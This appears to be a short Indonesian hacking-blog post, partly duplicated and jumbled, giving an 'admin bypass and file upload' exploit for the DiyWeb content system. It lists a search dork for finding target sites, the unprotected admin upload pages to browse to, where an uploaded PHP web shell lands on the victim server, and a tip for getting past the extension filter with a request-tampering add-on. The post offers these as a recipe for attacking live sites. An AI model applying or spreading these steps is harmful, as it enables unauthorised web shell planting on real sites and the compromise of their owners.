DIYWEB ADMIN BYPASS DAN FILE UPLOAD VULNERABILLITY
Exploit for DiyWeb File Upload Vulnerabillity
First, dorking yeah ...
File will be upload to http://victim.com/Images/yourfilehere.php
PS: If you can't upload shell with exstension .php, you can using tamper data or life http headers (AddOn Mozzila)
Sumber
First, dorking yeah ...
Dork : Power by DiyWebExploit :
inurl:/template.asp?menuid=
diyweb/menu/admin/image_manager.aspPoC :
diyweb/menu/admin/AspFIleImg/uploadtester.asp
http://victim.com/diyweb/menu/admin/image_manager.asp
http://victim.com/diyweb/menu/admin/AspFIleImg/uploadtester.asp
File will be upload to http://victim.com/Images/yourfilehere.php
PS: If you can't upload shell with exstension .php, you can using tamper data or life http headers (AddOn Mozzila)
Sumber
0 komentar:
Posting Komentar
[ Dofollow Blog ]
Hargai penulis dengan cara memberikan komentar di artikel ini ya sobat.
Dan berkomentarlah dengan kata-kata yang sopan dan bijak :D
Admin SH